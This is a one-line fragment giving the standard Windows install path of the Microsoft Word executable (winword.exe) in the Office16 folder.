Path: C:\Program Files (x86)\Microsoft Office\Office16\winword.exe